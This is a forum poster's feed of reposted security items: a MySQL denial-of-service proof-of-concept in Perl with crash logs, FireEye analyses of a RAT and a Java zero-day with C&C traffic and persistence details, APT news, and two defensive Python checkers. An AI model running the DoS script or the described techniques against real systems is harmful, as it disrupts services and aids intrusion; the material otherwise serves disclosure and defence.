Everything posted by Nytro
-
Generic Unpacking of Self-modifying, Aggressive, Packed Binary Programs
Piotr Bania, bania.piotr@gmail.com, March 2009

Abstract: Nowadays most of the malware applications are either packed or protected. These techniques are applied especially to evade signature based detectors and also to complicate the job of reverse engineers or security analysts. The time one must spend on unpacking or decrypting malware layers is often very long and in fact remains the most complicated task in the overall process of malware analysis. In this report the author proposes MmmBop as a relatively new concept of using dynamic binary instrumentation techniques for unpacking and bypassing detection by self-modifying and highly aggressive packed binary code. MmmBop is able to deal with most of the known and unknown packing algorithms and it is also suitable to successfully bypass most of currently used anti-reversing tricks. This framework does not depend on any other 3rd party software and it is developed entirely in user mode (ring3). MmmBop supports the IA-32 architecture and it is targeted for Microsoft Windows XP; some of the further deliberations will be referring directly to this operating system.

Download: http://piotrbania.com/all/articles/pbania-dbi-unpacking2009.pdf
-
MySQL Denial of Service Zeroday PoC
From: king cope <isowarez.isowarez.isowarez () googlemail com>
Date: Sat, 1 Dec 2012 22:26:16 +0100

(see attachment)

Kingcope

Attachment: mysql-dos.txt

5.5.19-log on SuSE Linux DoS exploit:
--------------------------------------------------------------------------------
use Net::MySQL;
use Unicode::UTF8 qw[decode_utf8 encode_utf8];
$|=1;
my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',    # Default use UNIX socket
    database => 'test',
    user     => "monty",
    password => "python",
    debug    => 1,
);
$mysql->_execute_command("\x12", "\x00\x00\x00\x00 foo");
exit;
for ($k=0;$k<50000;$k++) { $a .="<A$k>"; }
for ($k=0;$k<50000;$k++) { $a .="</A$k>"; }
# SELECT example
$mysql->query("SELECT UpdateXML('<a>$a<b>ccc</b><d></d></a>', '/a', '<e>fff</e>') AS val1");
my $record_set = $mysql->create_record_iterator;
while (my $record = $record_set->each) {
    printf "First column: %s Next column: %s\n", $record->[0], $record->[1];
}
$mysql->close;

Crash Log:
--------------------------------------------------------------------------------
started: /usr/local/mysql/bin/mysqld --log=/tmp/mysql55.log --user=mysql --log-bin=/tmp/logbin2 &
120108 12:55:28 - mysqld got signal 11 ;
This could be because you hit a bug. It is also possible that this binary
or one of the libraries it was linked against is corrupt, improperly built,
or misconfigured. This error can also be caused by malfunctioning hardware.
We will try our best to scrape up some info that will hopefully help diagnose
the problem, but since we have already crashed, something is definitely wrong
and this may fail.
key_buffer_size=16777216
read_buffer_size=262144
max_used_connections=1
max_threads=151
thread_count=1
connection_count=1
It is possible that mysqld could use up to key_buffer_size + (read_buffer_size + sort_buffer_size)*max_threads = 133453 K bytes of memory
Hope that's ok; if not, decrease some variables in the equation.
Thread pointer: 0x8e6fa48
Attempting backtrace. You can use the following information to find out
where mysqld died. If you see no messages after this, something went
terribly wrong...
stack_bottom = 0xa868b35c thread_stack 0x30000
/usr/local/mysql/bin/mysqld(my_print_stacktrace+0x33)[0x83b0f63]
/usr/local/mysql/bin/mysqld(handle_segfault+0x4bc)[0x813c59c]
[0xffffe400]
/usr/local/mysql/bin/mysqld(_Z16dispatch_command19enum_server_commandP3THDPcj+0x11b4)[0x81b09e4]
/usr/local/mysql/bin/mysqld(_Z10do_commandP3THD+0xbc)[0x81b13ac]
/usr/local/mysql/bin/mysqld(_Z24do_handle_one_connectionP3THD+0x183)[0x823eb63]
/usr/local/mysql/bin/mysqld(handle_one_connection+0x3c)[0x823ebbc]
/lib/libpthread.so.0(+0x5b05)[0xb771cb05]
/lib/libc.so.6(clone+0x5e)[0xb74e7d5e]
Trying to get some variables.
Some pointers may be invalid and cause the dump to abort.
Query ((nil)): is an invalid pointer
Connection ID (thread ID): 12
Status: NOT_KILLED
The manual page at http://dev.mysql.com/doc/mysql/en/crashing.html contains
information that should help you find out what is causing the crash.
Version: '5.5.19-log' socket: '/var/run/mysql/mysql.sock' port: 3306 Source distribution
[New Thread 0xa8f1db70 (LWP 7907)]
120108 13:01:51 [Warning] IP address '192.168.2.150' could not be resolved: Name or service not known
120108 13:01:51 [Note] Start binlog_dump to slave_server(65), pos(, 4294967295)

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xa8f1db70 (LWP 7907)]
mysql_binlog_send (thd=0x8e6fb28, log_ident=0x8eb57a8 "", pos=<value optimized out>, flags=65535) at /root/mysql-5.5.19/sql/sql_repl.cc:1043
1043        log_file_name, (llstr(my_b_tell(&log), llbuff2), llbuff2));
(gdb) x/10i $eip
=> 0x81bf54a <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1370>: mov 0x8(%ecx),%edx
   0x81bf54d <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1373>: mov 0x4(%ecx),%eax
   0x81bf550 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1376>: mov %edx,0x4(%esp)
   0x81bf554 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1380>: mov %eax,(%esp)
   0x81bf557 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1383>: call 0x8541560 <llstr>
   0x81bf55c <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1388>: mov -0x9b0(%ebp),%edx
   0x81bf562 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1394>: lea -0x590(%ebp),%eax
   0x81bf568 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1400>: mov %edi,0x1c(%esp)
   0x81bf56c <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1404>: lea -0x990(%ebp),%edi
   0x81bf572 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1410>: mov %eax,0x18(%esp)
(gdb) i r
eax            0xa8f1c804    -1460549628
ecx            0x0           0
edx            0xa8f1c805    -1460549627
ebx            0x8e821e0     149430752
esp            0xa8f1be50    0xa8f1be50
ebp            0xa8f1c868    0xa8f1c868
esi            0xa8f1c81a    -1460549606
edi            0xa8f1c804    -1460549628
eip            0x81bf54a     0x81bf54a <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1370>
eflags         0x210282      [ SF IF RF ID ]
cs             0x73          115
ss             0x7b          123
ds             0x7b          123
es             0x7b          123
fs             0x0           0
gs             0x33          51

unprivileged user (REPLICATION_SLAVE privs needed to trigger the bug):
--------------------------------------------------------------------------------
C:\Users\kingcope\Desktop>perl mysql.pl
Use INET Socket: 192.168.2.3 3306/tcp
Net::MySQL::_get_server_information():
4E 00 00 00 0A 35 2E 35 2E 31 39 2D 6C 6F 67 00  N....5.5.19-log.
01 00 00 00 59 4C 50 2C 29 28 2E 4F 00 FF F7 08  ....YLP,)(.O....
02 00 0F 80 15 00 00 00 00 00 00 00 00 00 00 22  ................
59 7C 24 3A 36 40 21 22 26 38 29 00 6D 79 73 71  Y...6....8).mysq
6C 5F 6E 61 74 69 76 65 5F 70 61 73 73 77 6F 72  l_native_passwor
64 00                                            d.
Protocol Version: 10
Server Version: 5.5.19-log
Salt: YLP,)(.O"Y|$:6 () !"&8)
Net::MySQL::_send_login_message():
41 00 00 01 0D A6 03 00 00 00 00 01 21 00 00 00  A...............
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 6D 6F 6E 74 79 32 00 14 21 2F FB 64  ....monty2.....d
27 B4 FE 26 89 F7 D6 E7 2A A1 C9 00 A9 CF 4E 51  '.......*.....NQ
74 65 73 74 00                                   test.
Net::MySQL::_request_authentication():
07 00 00 02 00 00 00 02 00 00 00                 ...........
connect database
Net::MySQL::_execute_command():
0A 00 00 00 12 00 00 00 00 00 00 FF 00 00        ..............
Net::MySQL::_execute_command():
68 00 00 01 FF CB 04 23 34 32 30 30 30 41 63 63  h.......42000Acc
65 73 73 20 64 65 6E 69 65 64 3B 20 79 6F 75 20  ess.denied;.you.
6E 65 65 64 20 28 61 74 20 6C 65 61 73 74 20 6F  need.(at.least.o
6E 65 20 6F 66 29 20 74 68 65 20 52 45 50 4C 49  ne.of).the.REPLI
43 41 54 49 4F 4E 20 53 4C 41 56 45 20 70 72 69  CATION.SLAVE.pri
76 69 6C 65 67 65 28 73 29 20 66 6F 72 20 74 68  vilege(s).for.th
69 73 20 6F 70 65 72 61 74 69 6F 6E              is.operation

Source: Full Disclosure: MySQL Denial of Service Zeroday PoC
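As an added defensive illustration (not code from the original post), the Python below applies the framing and field-length checks a server-side handler should perform before honouring a COM_BINLOG_DUMP request (command byte 0x12, the command the PoC sends). It assumes the standard payload layout (4-byte binlog position, 2-byte flags, 4-byte server id, then the binlog filename); the 14-byte packet is the one from the debug trace above, and the well-formed packet is constructed by the helper.

```python
"""Length-check a MySQL client command packet before acting on COM_BINLOG_DUMP.

Packet framing: 3-byte little-endian payload length, 1-byte sequence id, payload.
COM_BINLOG_DUMP payload (standard layout, assumed here):
    cmd(1)=0x12  binlog_pos(4, LE)  flags(2, LE)  server_id(4, LE)  filename(rest)
"""
import struct

COM_BINLOG_DUMP = 0x12
FIXED_LEN = 1 + 4 + 2 + 4  # command byte plus the three fixed-width fields

# The exact bytes the client sent in the Net::MySQL debug trace above.
PACKET_FROM_TRACE = bytes.fromhex("0A000000" "12000000000000FF0000")


def parse_packet(raw):
    """Split one protocol packet into (sequence_id, payload).

    Raises ValueError when the buffer is shorter than the header claims, so a
    caller never reads past the end of what was actually received.
    """
    if len(raw) < 4:
        raise ValueError("header truncated")
    length = raw[0] | (raw[1] << 8) | (raw[2] << 16)
    payload = raw[4:4 + length]
    if len(payload) != length:
        raise ValueError("payload truncated: header says %d, got %d" % (length, len(payload)))
    return raw[3], payload


def parse_binlog_dump(payload):
    """Decode a COM_BINLOG_DUMP payload, rejecting anything shorter than its fixed fields."""
    if not payload or payload[0] != COM_BINLOG_DUMP:
        raise ValueError("not a COM_BINLOG_DUMP command")
    if len(payload) < FIXED_LEN:
        raise ValueError("COM_BINLOG_DUMP needs %d fixed bytes, got %d" % (FIXED_LEN, len(payload)))
    pos, flags, server_id = struct.unpack_from("<IHI", payload, 1)
    name = payload[FIXED_LEN:].rstrip(b"\x00")
    # Binlog names are plain file names; a path separator or a non-printable
    # byte has no legitimate use here, so refuse it rather than pass it on.
    if any(c < 0x20 or c > 0x7E for c in name) or b"/" in name or b"\\" in name:
        raise ValueError("invalid binlog filename")
    return {"pos": pos, "flags": flags, "server_id": server_id, "filename": name.decode("ascii")}


def build_binlog_dump(pos, flags, server_id, filename, seq=0):
    """Constructed helper: frame a well-formed COM_BINLOG_DUMP packet for testing."""
    payload = bytes([COM_BINLOG_DUMP]) + struct.pack("<IHI", pos, flags, server_id) + filename.encode("ascii")
    n = len(payload)
    return bytes([n & 0xFF, (n >> 8) & 0xFF, (n >> 16) & 0xFF, seq]) + payload


def check(raw):
    """Return "ok" for a request that passes every check, else "reject: <reason>"."""
    try:
        _, payload = parse_packet(raw)
        parse_binlog_dump(payload)
        return "ok"
    except ValueError as e:
        return "reject: %s" % e


if __name__ == "__main__":
    print(check(PACKET_FROM_TRACE))
    print(check(build_binlog_dump(4, 0, 65, "mysql-bin.000001")))
```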
-
Torvalds clarifies Linux's Windows 8 Secure Boot position | ZDNet
-
[h=1]Compress Data More Densely with Zopfli[/h]
The Zopfli Compression Algorithm is a new, open sourced general purpose data compression library that got its name from a Swiss bread recipe. It is an implementation of the Deflate compression algorithm that creates a smaller output size compared to previous techniques. The smaller compressed size allows for better space utilization, faster data transmission, and lower web page load latencies. Furthermore, the smaller compressed size has additional benefits in mobile use, such as lower data transfer fees and reduced battery use. The higher data density is achieved by using more exhaustive compression techniques, which make the compression a lot slower, but do not affect the decompression speed. The exhaustive method is based on iterating entropy modeling and a shortest path search algorithm to find a low bit cost path through the graph of all possible deflate representations. The output generated by Zopfli is typically 3–8% smaller compared to zlib at maximum compression, and we believe that Zopfli represents the state of the art in Deflate-compatible compression. Zopfli is written in C for portability. It is a compression-only library; existing software can decompress the data. Zopfli is bit-stream compatible with compression used in gzip, Zip, PNG, HTTP requests, and others. Due to the amount of CPU time required, 2–3 orders of magnitude more than zlib at maximum quality, Zopfli is best suited for applications where data is compressed once and sent over a network many times — for example, static content for the web. By open sourcing Zopfli, thus allowing webmasters to better optimize the size of frequently accessed static content, we hope to make the Internet a bit faster for all of us.
By Lode Vandevenne, Software Engineer, Compression Team
Source: Google Open Source Blog: Compress Data More Densely with Zopfli
-
[h=1]Hacking Group obtains 1TB of Data from Governments[/h]
Posted by: FastFlux, March 1, 2013
The primary targets seem to be government authorities from Asia, the Middle East and Eastern Europe. Academic and military institutions, an embassy and even a major search engine have also been targeted. Established by the company's research, approximately 30,000 organizations had data stolen over a period of a few years. The cybercriminals use approximately 500 command and control servers, each being capable of transmitting data with 20 victims at a time. Each of these servers is capable of extracting around 2.4 GB of information per day, amounting to 1 TB of data stolen per day, and 365 TB in a year. The company hasn't provided many details about the attacker, but Team Cymru Director Steve Santorelli has told The Verge that judging by the vast quantity of data, it's most likely the work of a state-sponsored group. No known countries took part in these attacks, which is part of the problem. According to analysts and investigators US networks are assaulted daily by hackers. Some of these hackers are developing custom-made software designed to assist taking hold of computer systems.
Source: Hacking Group obtains 1TB of Data from Governments | ZeroSecurity
-
It's a Kind of Magic In our last post we shared our initial analysis of the malware that is installed as a result of the PDF found in the wild that exploits the then-zero-day vulnerabilities, CVE-2013-0640 and CVE-2013-0641. Today we are sharing more details about this new malware, which we have dubbed "666." The following is not a complete analysis, but outlines some of the main functionality and its interesting features. At its heart, this malware is a remote administration tool (RAT) with information-stealing capabilities. It initially accomplishes its goals through the use of three separate DLLs that work in harmony, each playing its own role. We say "initially" because there appears to be support for DLL plugins to be added in the future. There are also references to 64-bit versions of the initial three DLLs. For example, there is a LangBar64.dll to complement LangBar32.dll. For the remainder of this post, we will refer to the DLLs by their filenames but without the "32" or "64" characters at the end. The DLLs appear to be compiled with MinGW, judging by the way parameters are placed on the stack and from strings found in the DLLs. They all employ a string encryption technique for which we are sharing an IDA IDC script to aid any researchers who wish to study further. A simplified illustration of how key stroke, clipboard, and account data are collected and exfiltrated Components LangBar is the main module that drives execution. It has an export named CallW that is called in order to install it on the system. It maintains persistence by creating several registry items, including HKCU\Software\Microsoft\CTF\LangBarAddin\{12345678-1234-1234-1234567890AB}\’FilePath’ = <path to LangBar>. With ctfmon.exe running and the proper registry values set, this DLL will be loaded into all created processes. It behaves differently depending on which process it is loaded into. 
The DLL loaded into explorer.exe is the main instance, coordinating behavior with all the other instances of the loaded DLLs. Any behavior that the author designed to only occur in one instance happens from Explorer. LangBar is responsible for loading the other DLLs into its process and lbarext is only loaded into the Explorer process due to its nature, which will be explained later. Coordination between the processes and DLLs occur in several ways, including registry keys and values stored under the key HKCU\Software\Microsoft\Media\Other (referred to as "the Media key" for the remainder of this blog), named file mapping objects, and a named pipe. Instances where Langbar is loaded into processes for popular internet applications such as the browsers, messengers, and mail clients mentioned in our previous blog can serve as the downloading/uploading component, using the mutex JKDFHIUEJDH to coordinate whose responsibility it is. lbarhlp is mainly a data theft component. It writes the stolen data to the named pipe \\.\pipe\H5_kds..8j23_zsP2. It checks which process it is loaded into against a small list (iexplore.exe,outlook.exe,msnmsgr.exe,wlmail.exe,winmail.exe) and performs data theft specific to that application, usually account- and cache-related, using various Windows APIs and the registry. It installs a key logging hook that also steals clipboard data. We found a very interesting easter egg of sorts in the key logging thread. If the victim types the letters "optresclone," a message box appears that reads, "It's a kind of magic!" and it proceeds to log this event with a timestamp and the word "secreto." The message box text may be a reference to the Queen song "A Kind of Magic." This seemed to be a peculiar move by the author. It's somewhat of a risk to put this in as a joke since it could give the malware's presence away in the off chance someone happens to type this sequence of characters. 
Further pondering on this led to the theory that this may be some kind of extortion feature. The attacker could spy on his target(s) for a while and then threaten them. If they ask for proof that he has compromised them, the attacker can just tell them to type the magic word and the victims would be able to see for themselves. As a result, this provides an easy way for someone to determine if he was the victim of this attack: just type "optresclone" into one of the monitored applications such as Internet Explorer and see if the message box appears. We caution that victims' computers should be disconnected from the network before performing this test and not allowed back onto a network until the malware has been disabled in order to avoid tipping off the attacker that you are aware of his presence. lbarext is mainly responsible for receiving stolen data from lbarhlp and then packaging and encrypting it. It reads this data from the named pipe and stores it in an encrypted file named kmt32.pod. It is also responsible for processing commands that are received from the command and control (C&C) server. In addition to these tasks, it opens an invisible window with a Windows procedure that logs whenever a new volume is introduced to the system, including information provided by GetVolumeInformation for all attached drives. An interesting thing to note here is that the author spells disk with a "c" ("disc") in all cases. Typically, those in technology would refer to magnetic media using the "k" spelling ("disk") while using the "c" spelling to refer to optical media. For common usage of the word referring to flat, round objects, those in the UK typically use the "c" spelling while those in the USA use the "k" spelling. Of course, no strong conclusions can be made from this.
Commands
The commands it supports can be broken down into two categories: "configuration commands" and "RAT commands."
The RAT commands include the following:
- Log connected volume information
- Scan directory
- Steal directory
- Steal file
- Get system/network info
- Call plugin export
- Scan registry key
- Remote shell
The scan/steal commands follow blacklists and whitelists for directory names and file extensions that are stored under the Media key. Directory names and file extensions that are present in the blacklists are ignored, and only whitelisted file extensions are considered. Information about files already stolen is also stored under the Media key to avoid sending the same file twice. The initial configuration of these lists tends to slant towards documents and away from media and code related files. The extensibility of this RAT is noteworthy. It has a plugin architecture, allowing the user to craft new DLLs that export functions that follow a particular convention and can be integrated seamlessly. One of the arguments passed to a plugin DLL must be the name of the named pipe, \\.\pipe\H5_kds..8j23_zsP2, which is where the data is written to be sent out.
The configuration commands include the following:
- add/remove Media key/val
- add/remove whitelist/blacklist scan entry
- add/remove automated tasks
- delete file/directory
- change C&C URL
Of note here is the ability to change C&C servers and the ability to configure automated tasks. Automated tasks can be any supported command and can be configured to run at specific times.
Command and Control (C&C)
HTTP is used for C&C. Each beacon is a GET request followed by a POST request. The GET request is used as a test to ensure that the C&C server is still available and valid. In the case that a "Proxy Authentication Required" response code is issued (407), the malware will attempt to authenticate using each set of credentials it has stolen in turn. If an "OK" response code is issued (200), these credentials are stored in a separate value in the registry under the Media key for future use.
The original C&C server information is hardcoded as encrypted strings. The domain name "Bollsilloner.es" is interesting because "bolsillo" is Spanish for "pocket" and when you pronounce "Bolsilloner" aloud, it sounds like "bazillionaire." The POST request sends its data in multipart/form-data format. During our live run of the malware, we were able to capture a pcap of the initial communications sent and received. We witnessed the requests for the lbarhlp and lbarext DLLs and what we believe to be a request for commands. The field name "i" was present in all POST requests and is the same value that can be found in the "ID" value under the Media key. This may be an identifier for the victim based on the name "ID" and the fact that it is sent with each request. The field name "c" was set to "2" when requesting files to be downloaded, "0" when uploading files, and "1" for the requests that received a response with an empty body. A "c" value of "1" may indicate the request for commands. Most of the inbound and outbound data is compressed and encrypted.
Registry Values
There are many registry values employed by this malware. Below are a few of the more significant ones whose meaning we have uncovered. Most of these values use wide characters and are encrypted. We have provided a python decryption tool for researchers and those affected by this RAT who wish to learn more about its configuration and activities.
- "UI": A boolean value that, when set to true, will trigger uninstallation. May possibly be short for "Uninstall."
- "SD": 8 characters representing a date: "YYYYMMDD." This value is used for a long term sleep feature where the malware will remain inactive until the date is reached. May possibly be short for "Sleep Date."
- "SP": The directory where the installed DLL modules are located. May possibly be short for "Storage Path."
- "UT": Another date formatted like "SD." When this date is reached, the malware uninstalls itself (sets "UI" to 1). May possibly be short for "Uninstall Time."
- "ID": A string used as the value for the "i" parameter in the HTTP POST requests sent by the malware. This string may be an identifier for the victim, and also designates the filename used to store commands received that are to be processed.
- "AD": An alternative URL for C&C; the default URL is hardcoded as an encrypted string. May possibly be short for "Alternative Download."
- "PI": Base64 encoded value that holds the proxy name, username, and password for an HTTP proxy. May possibly be short for "Proxy Information."
- "PIS": Base64 encoded value that holds all the sets of credentials stolen by the malware. May possibly be short for "Personal Information Storage."
MiniDuke
Kaspersky and CrySyS Lab recently released a report providing some details on another series of attacks using the same exploit that delivers this payload. They named the malware "MiniDuke" and raised the pertinent question of whether these attacks are related. Our initial research into this topic, although not conclusive, hints towards at least the authors of the malware being different. The same name has been used for all the droppers in the attacks found so far: "L2P.T." This was likely done out of convenience to avoid having to change the shellcode in any way. However, many differences are found in the droppers used in the MiniDuke attacks as compared to the dropper used in this attack. For starters, in this attack, the dropper was compiled with MinGW just like the malware payload itself. It also employs the same string encryption and error handling functions as the malware, whereas the MiniDuke droppers' strings are plainly visible. The decoy PDF found in this dropper is encrypted whereas the MiniDuke dropper's decoy PDF is plainly visible in the resource section. This dropper opens its decoy PDF directly using the ShellExecute API whereas MiniDuke's dropper creates a BAT file that kills the existing acrobat process along with opening the decoy PDF.
Lastly, the project's pdb file path is not visible in this dropper's strings as it is in MiniDuke's droppers' strings. Despite all these differences, there is still the curious reference to the number "666," which both of the payloads share, albeit in different ways. In this case, "666" is specified as the preferred image base address whereas in MiniDuke's case, it is referenced as stray bytes in its code. The question remains: is this a coincidence or is there a connection?
Additional Resources
Download research tools here.
Here are the MD5 hashes of the DLLs:
LangBar32.dll - 97777f269ae807891dac4b388c66a952
lbarext32.dll - 1663de170dd03a105d5708841b709797
lbarhlp32.dll - 8e4954693a37a8e5731d0781ccec06c1
Special thanks to Gregory Newman for his assistance in analysis and tool writing.
James T. Bennett on 2013.02.28
Source: Malware Intelligence Lab from FireEye - Research & Analysis of Zero-Day & Advanced Targeted Threats: It's a Kind of Magic
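The C&C section above describes a behaviour a proxy can see: after a 407 challenge the implant retries with each stolen credential set in turn until one is accepted. The Python below, an added example that is not part of the FireEye post, implements that detection over a constructed, simplified proxy log; the log format, host names and usernames are all assumptions for the demonstration.

```python
"""Flag clients that rotate through several proxy usernames after a 407 challenge.

Constructed, simplified log format (one request per line, space-separated):
    <unix_time> <client_ip> <status> <method> <host> <proxy_user>
where <proxy_user> is the username from the Proxy-Authorization header, or
"-" when the request carried no credentials.
"""
from collections import defaultdict

# Constructed sample. 10.0.0.7 is challenged, then retries with three different
# usernames until one is accepted (and keeps using it for the POST beacon);
# 10.0.0.9 is an ordinary user who authenticates once. Host names are
# placeholders, not the real C&C domain named in the article.
SAMPLE_LOG = """\
1362000001 10.0.0.7 407 GET c2.example.invalid -
1362000002 10.0.0.7 407 GET c2.example.invalid alice
1362000003 10.0.0.7 407 GET c2.example.invalid bob
1362000004 10.0.0.7 200 GET c2.example.invalid carol
1362000005 10.0.0.7 200 POST c2.example.invalid carol
1362000010 10.0.0.9 407 GET intranet.example.invalid -
1362000011 10.0.0.9 200 GET intranet.example.invalid dave
"""


def parse_line(line):
    ts, client, status, method, host, user = line.split()
    return {"ts": int(ts), "client": client, "status": int(status),
            "method": method, "host": host, "user": user}


def find_credential_cycling(log_text, min_distinct_users=2, window_seconds=300):
    """Return one finding per (client, host) that presented several distinct
    proxy usernames within window_seconds of its first 407.

    A benign client answers a 407 with a single identity. A process holding a
    store of stolen credentials (the "PIS" value above) tries them one after
    another, so several usernames from one client in a short window is the
    signal; the username that finally earned a 2xx is recorded as well.
    """
    per_key = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_line(line)
            per_key[(rec["client"], rec["host"])].append(rec)

    findings = []
    for (client, host), recs in per_key.items():
        recs.sort(key=lambda r: r["ts"])
        challenge_ts = None   # time of the first 407 seen for this client/host
        tried = []            # distinct usernames presented after the challenge
        succeeded_as = None   # first username that got a 2xx back
        for rec in recs:
            if rec["status"] == 407 and challenge_ts is None:
                challenge_ts = rec["ts"]
            if challenge_ts is None or rec["ts"] - challenge_ts > window_seconds:
                continue
            if rec["user"] != "-" and rec["user"] not in tried:
                tried.append(rec["user"])
            if 200 <= rec["status"] < 300 and succeeded_as is None and rec["user"] != "-":
                succeeded_as = rec["user"]
        if len(tried) >= min_distinct_users:
            findings.append({"client": client, "host": host,
                             "users_tried": tried, "succeeded_as": succeeded_as})
    return findings


if __name__ == "__main__":
    for finding in find_credential_cycling(SAMPLE_LOG):
        print(finding)
```

Tune min_distinct_users and window_seconds to the proxy's normal retry behaviour; the "succeeded_as" username tells you which stolen credential set is now in use and should be reset.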
-
[h=2]YAJ0: Yet Another Java Zero-Day[/h]
Through our Malware Protection Cloud (MPC), we detected a brand new Java zero-day vulnerability that was used to attack multiple customers. Specifically, we observed successful exploitation against browsers that have Java v1.6 Update 41 and Java v1.7 Update 15 installed. Unlike other popular Java vulnerabilities, in which the security manager can be disabled easily, this vulnerability leads to arbitrary memory read and write in the JVM process. After triggering the vulnerability, the exploit looks for the memory which holds JVM internal data structures, such as whether the security manager is enabled or not, and then overwrites that chunk of memory with zeros. Upon successful exploitation, it will download a McRAT executable (MD5: b6c8ede9e2153f2a1e650dfa05b59b99 as svchost.jpg) from the same server hosting the JAR file and then execute it.
Figure 1. Example HTTP GET of the McRAT after the browser is successfully exploited, prior to the endpoint becoming fully compromised.
The exploit is not very reliable, as it tries to overwrite a big chunk of memory. As a result, in most cases, upon exploitation, we can still see the payload downloading, but it fails to execute and yields a JVM crash. When the McRAT successfully installs in the compromised endpoint as an EXE (MD5: 4d519bf53a8217adc4c15d15f0815993), it generates the following HTTP command and control traffic:
POST /59788582 HTTP/1.0
Content-Length: 44
Accept: text/html,application/xhtml+xml,application/xml,*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 110.XXX.55.187
Pragma: no-cache

4PdWXOD3Vlzg91Zc4PdWXOD3Vlzg91Zc4PdWXMP1RXw.
McRAT persists by writing a copy of itself as a DLL to C:\Documents and Settings\admin\AppMgmt.dll and performing the following registry modifications:
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = C:\Documents and Settings\admin\AppMgmt.dll
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = %SystemRoot%\System32\appmgmts.dll
This post was intended to serve as a warning to the general public. We have notified Oracle and will continue to work with Oracle on this in-the-wild discovery. Since this exploit affects the latest Java 6u41 and Java 7u15 versions, we urge users to disable Java in their browser until a patch has been released; alternatively, set your Java security settings to "High" and do not execute any unknown Java applets outside of your organization. We will continue to update this blog as new information about this threat is found. FireEye would like to acknowledge and thank Hermes Bojaxhi and his team at CyberESI for their assistance in confirming this Java zero-day vulnerability. This blog was written by FireEye researchers Darien Kindlund and Yichong Lin.
Update: Oracle assigned CVE-2013-1493 to this vulnerability.
Source: Malware Intelligence Lab from FireEye - Research & Analysis of Zero-Day & Advanced Targeted Threats: YAJ0: Yet Another Java Zero-Day
-
[h=1]An HTML5 exploit lets any website fill your hard disk in a few minutes[/h]
Aurelian Mihai - 1 Mar 2013
Whether we land on the blog of someone fond of bad jokes or on a website controlled by malicious people, the computer we are browsing from can fall victim to an exploit that allows the hard disk to be filled with useless data and even the web browser to be frozen. To blame is an oversight in the Web Storage standard, which is part of the set of HTML5 technologies shipped with practically any modern web browser. The Web Storage feature allows any website to place data on the user's hard disk, used to personalise certain services and applications. The problem is that the standard does not define a limit on the volume of data a website can store at any one time, hence the risk that someone transfers more data than is reasonable, causing real problems for users by quickly filling the hard disk with data. Fortunately, data stored this way is still isolated from the rest of the system, and the opportunistic attacker cannot gain access to the targeted PCs. Surprisingly, the W3C (the organisation responsible for approving HTML5 technologies) anticipated the possibility of this oversight being exploited maliciously, recommending that software developers limit the disk space allocated to each website, or include a mechanism that warns users when the website they are visiting tries to monopolise more than 5 MB of storage space. For now only Mozilla seems to have taken the warnings seriously, including certain protection mechanisms that shield Firefox users from trouble. In contrast, users of Google Chrome, Microsoft Internet Explorer, Opera and Apple Safari are left exposed. Moreover, once the available hard disk space is exhausted, the Chrome web browser suffers frequent freezes that cause users even more trouble. Those who want to try this exploit at their own risk can visit the website FillDisk.com. It should be known that the storage space occupied in this abusive way can be recovered using the browser's option to clear browsing history, with the option for temporary files and website data ticked.
Source: An HTML5 exploit lets any website fill your hard disk in a few minutes
-
The MiniDuke Mystery: PDF 0day Government Spy Assembler 0x29A Micro Backdoor
Authors: Costin Raiu, Igor Soumenkov, Kurt Baumgartner, Vitaly Kamluk, Global Research and Analysis Team, Kaspersky Lab
On Feb 12th 2013, FireEye announced the discovery (http://blog.fireeye.com/research/2013/02/the-number-of-the-beast.html) of an Adobe Reader 0-day exploit which is used to drop a previously unknown, advanced piece of malware. We called this new malware "ItaDuke" because it reminded us of Duqu and because of the ancient Italian comments in the shellcode copied from Dante Alighieri's Divine Comedy. Since the original announcement, we have observed several new incidents using the same exploit (CVE-2013-0640), some of which were so unusual that we decided to analyze them in depth. Together with our partner CrySyS Lab, we've performed a detailed analysis of these new incidents which indicate a new, previously unknown threat actor. For their analysis, please read http://blog.crysys.hu/2013/02/miniduke/ . For our analysis, please read below. First of all, while the fake "Mandiant" PDF reports (see http://blog.seculert.com/2013/02/spear-phishing-with-mandiant-apt-report.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+SeculertResearchLab+(Seculert+Research+Lab)) are just dirty hacks of the original exploit, these newer attacks appear to have been created by a 0-day toolkit that was used to build the original "Visaform Tukey.pdf" discovered by FireEye.
Download: http://www.securelist.com/en/downloads/vlpdfs/themysteryofthepdf0-dayassemblermicrobackdoor.pdf
-
[h=1]The world's first phone without a speaker, brought to MWC 2013. You can talk on it even through walls. VIDEO[/h]
The Torque Kyocera is a completely special smartphone. Unfortunately, the Torque Kyocera is not sold in Europe, and despite its less elegant design it is astonishing in that it has no speaker. The sound is instead reproduced through a device that manages to transmit the vibration through any surface to the user, even when the user is wearing headphones.
Video: The world's first phone without a speaker, brought to MWC 2013. You can talk on it even through walls. VIDEO
-
Linux possible privilege escalation exploits
I see more and more fixes appearing on the mailing lists for NULL pointer dereferences or other problems that can lead to privilege escalation. A few:
- oss-sec: CVE request: Linux kernel: USB: io_ti: NULL pointer dereference
- oss-sec: CVE request - Linux kernel: VFAT slab-based buffer overflow
- oss-sec: kernel: tmpfs use-after-free
- oss-sec: CVE request - Linux kernel: evm: NULL pointer de-reference flaw
- oss-sec: CVE request -- Linux kernel: net: CIPSO_V4_TAG_LOCAL tag NULL pointer dereference
